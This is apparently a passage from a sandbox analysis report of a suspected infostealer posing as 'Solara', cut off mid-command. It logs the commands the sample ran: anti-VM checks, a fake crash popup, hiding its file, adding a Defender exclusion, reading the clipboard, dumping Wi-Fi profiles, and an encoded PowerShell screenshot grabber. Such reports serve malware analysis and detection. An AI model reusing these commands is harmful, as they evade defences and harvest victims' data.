        System Location Discovery: System Language Discovery
        
        PID:900
      - C:\Program Files (x86)\Microsoft\Temp\EUD38C.tmp\MicrosoftEdgeUpdate.exe
        
        "C:\Program Files (x86)\Microsoft\Temp\EUD38C.tmp\MicrosoftEdgeUpdate.exe" /silent /install "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers"
        6⤵
        Event Triggered Execution: Image File Execution Options Injection
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1572
        
        C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regsvc
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:2376
        
        C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regserver
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:1920
        
        C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.43\MicrosoftEdgeUpdateComRegisterShell64.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.43\MicrosoftEdgeUpdateComRegisterShell64.exe"
        8⤵
        Modifies registry class
        
        PID:1820
        
        C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.43\MicrosoftEdgeUpdateComRegisterShell64.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.43\MicrosoftEdgeUpdateComRegisterShell64.exe"
        8⤵
        Modifies registry class
        
        PID:3380
        
        C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.43\MicrosoftEdgeUpdateComRegisterShell64.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.43\MicrosoftEdgeUpdateComRegisterShell64.exe"
        8⤵
        Modifies registry class
        
        PID:508
        
        C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7QkVEQTc5RDgtN0IzRC00NjNBLTlDQTctQzkzNjFFRjI0QTlBfSIgdXNlcmlkPSJ7N0ZGN0Q5QTctNDI5Ri00QjNDLUEzREEtNkREN0M4QTNBOTQ2fSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9InsxMTVGNTg5OC00N0FELTQ1RjItOEM4RS0yNkY2MTFEMjZEQjR9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE5MDQxLjEyODgiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIiBpc19pbl9sb2NrZG93bl9tb2RlPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iIiBwcm9kdWN0X25hbWU9IiIvPjxleHAgZXRhZz0iIi8-PGFwcCBhcHBpZD0ie0YzQzRGRTAwLUVGRDUtNDAzQi05NTY5LTM5OEEyMEYxQkE0QX0iIHZlcnNpb249IjEuMy4xNDcuMzciIG5leHR2ZXJzaW9uPSIxLjMuMTk1LjQzIiBsYW5nPSIiIGJyYW5kPSIiIGNsaWVudD0iIj48ZXZlbnQgZXZlbnR0eXBlPSIyIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI0OTMxOTYyODEzIiBpbnN0YWxsX3RpbWVfbXM9IjU0NSIvPjwvYXBwPjwvcmVxdWVzdD4
        7⤵
        Executes dropped EXE
        Checks system information in the registry
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3708
        
        C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /handoff "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers" /installsource otherinstallcmd /sessionid "{BEDA79D8-7B3D-463A-9CA7-C9361EF24A9A}" /silent
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5040
    - - C:\ProgramData\Solara\Solara.exe
        
        "C:\ProgramData\Solara\Solara.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Loads dropped DLL
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        
        PID:2380
      - C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.115\msedgewebview2.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.115\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=Solara.exe --webview-exe-version=3.0.0.0 --user-data-dir="C:\ProgramData\Solara\Solara.exe.WebView2\EBWebView" --noerrdialogs --embedded-browser-webview-dpi-awareness=1 --mojo-named-platform-channel-pipe=2380.5056.2472911427206972911
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        Checks system information in the registry
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        System policy modification
        
        PID:4836
        
        C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.115\msedgewebview2.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.115\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\ProgramData\Solara\Solara.exe.WebView2\EBWebView /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\ProgramData\Solara\Solara.exe.WebView2\EBWebView\Crashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=132.0.6834.84 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.115\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=132.0.2957.115 --initial-client-data=0x158,0x15c,0x160,0x134,0x168,0x7ff9f49eb078,0x7ff9f49eb084,0x7ff9f49eb090
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4880
        
        C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.115\msedgewebview2.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.115\msedgewebview2.exe" --type=gpu-process --string-annotations --noerrdialogs --user-data-dir="C:\ProgramData\Solara\Solara.exe.WebView2\EBWebView" --webview-exe-name=Solara.exe --webview-exe-version=3.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=1816,i,16372267418442497293,15592340069715187445,262144 --variations-seed-version --mojo-platform-channel-handle=1812 /prefetch:2
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2268
        
        C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.115\msedgewebview2.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.115\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\ProgramData\Solara\Solara.exe.WebView2\EBWebView" --webview-exe-name=Solara.exe --webview-exe-version=3.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --always-read-main-dll --field-trial-handle=2000,i,16372267418442497293,15592340069715187445,262144 --variations-seed-version --mojo-platform-channel-handle=2052 /prefetch:3
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3172
        
        C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.115\msedgewebview2.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.115\msedgewebview2.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\ProgramData\Solara\Solara.exe.WebView2\EBWebView" --webview-exe-name=Solara.exe --webview-exe-version=3.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --always-read-main-dll --field-trial-handle=2340,i,16372267418442497293,15592340069715187445,262144 --variations-seed-version --mojo-platform-channel-handle=2356 /prefetch:8
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:224
        
        C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.115\msedgewebview2.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.115\msedgewebview2.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\ProgramData\Solara\Solara.exe.WebView2\EBWebView" --webview-exe-name=Solara.exe --webview-exe-version=3.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=" --always-read-main-dll --field-trial-handle=3564,i,16372267418442497293,15592340069715187445,262144 --variations-seed-version --mojo-platform-channel-handle=3576 /prefetch:1
        7⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Your program has crashed', 0, 'Windows', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2836
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Your program has crashed', 0, 'Windows', 0+16);close()"
      4⤵
      PID:3188
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1500
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3852
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4784
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:1576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3940
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:3596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1228
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:3060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4960
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:5048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\SolaraV3.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:4328
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\SolaraV3.exe"
      4⤵
      Views/modifies file attributes
      PID:3160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌‍.scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3936
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌‍.scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3504
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4864
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2868
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:508
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:3200
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:1576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:4748
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:2604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:3892
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4744
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:4656
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:900
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:1420
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:2568
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:5096
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:1716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:1672
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB